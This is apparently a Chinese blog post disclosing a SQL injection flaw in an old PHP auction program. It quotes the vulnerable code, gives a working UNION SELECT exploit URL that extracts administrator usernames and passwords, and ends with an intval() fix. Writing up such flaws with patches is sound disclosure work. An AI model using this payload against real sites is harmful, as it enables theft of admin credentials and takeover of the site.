一个老旧PHP拍卖程序,目前最新版本是6.06。直接看代码:
auction_details.php:
$template->set('msg_changes_saved', $msg_changes_saved);
$item_details['quantity'] = $item->set_quantity($item_details['quantity']);
$custom_fld->save_edit_vars($item_details['owner_id'], $page_handle);
$media_details = $item->get_media_values($_REQUEST['auction_id']);//没有过滤
$item_details['ad_image'] = $media_details['ad_image'];
$item_details['ad_video'] = $media_details['ad_video'];
$template->set('item_details', $item_details);
$template->set('buyout_only', $item->buyout_only($item_details));
includes/class_item.php:
function get_media_values($auction_id, $wanted_ad = false)
{
$output = array('auction_id' => $auction_id, 'ad_image' => null, 'ad_video' => null);
(int) $counter_image = 0;
(int) $counter_video = 0;
$field_type = ($wanted_ad) ? 'wanted_ad_id' : 'auction_id';
//这里就是我们要注入的地方,由于回显是图片,所以media_type必须为1
$sql_select_media = $this->query("SELECT media_url, media_type FROM " . DB_PREFIX ."auction_media WHERE" . $field_type . "=" . $auction_id . " AND upload_in_progress=0 ORDER BY media_id ASC");
while($media_details = $this->fetch_array($sql_select_media))
{
if ($media_details['media_type'] == 1) // 1 是图片
{
$output['ad_image'][$counter_image++] = $media_details['media_url'];
}
else if ($media_details['media_type'] == 2) // video
{
$output['ad_video'][$counter_video++] = $media_details['media_url'];
}
}
return $output;
}
利用方法:
auction_details.php?name=物品名称& auction_id=物品ID and 1=2 union select concat(username,0x3a,password,0x3a),1 from probid_admins--
Image is broken 的路径包含了管理员账号和密码
修复方法:
把auction_details.php的
$media_details = $item->get_media_values($_REQUEST['auction_id']);
修改为
$media_details = $item->get_media_values(intval($_REQUEST['auction_id']));
没有评论:
发表评论